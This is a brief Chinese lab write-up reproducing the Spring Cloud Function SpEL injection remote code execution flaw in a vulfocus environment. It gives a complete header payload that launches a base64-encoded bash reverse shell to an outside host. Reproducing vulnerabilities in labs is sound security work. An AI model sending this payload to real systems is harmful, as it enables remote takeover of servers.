前言
最近Spring Cloud Function组件爆出0day -- SpEL表达式注入导致RCE,官方commit中的test已经公开对应细节。
影响版本
3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
漏洞复现
环境来自vulfocus靶场
1、开启环境
2、利用burp抓包,需要给他一个路径
3、在vps开启监听
4、修改数据包,将反弹shell进行base64编码,并添加一个Content-Type
payload: spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNxxzEyMC43OC4yMzkuMTkxLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}")
Content-Type:application/x-www-form-urlencoded
5、发包之后成功收到反弹shell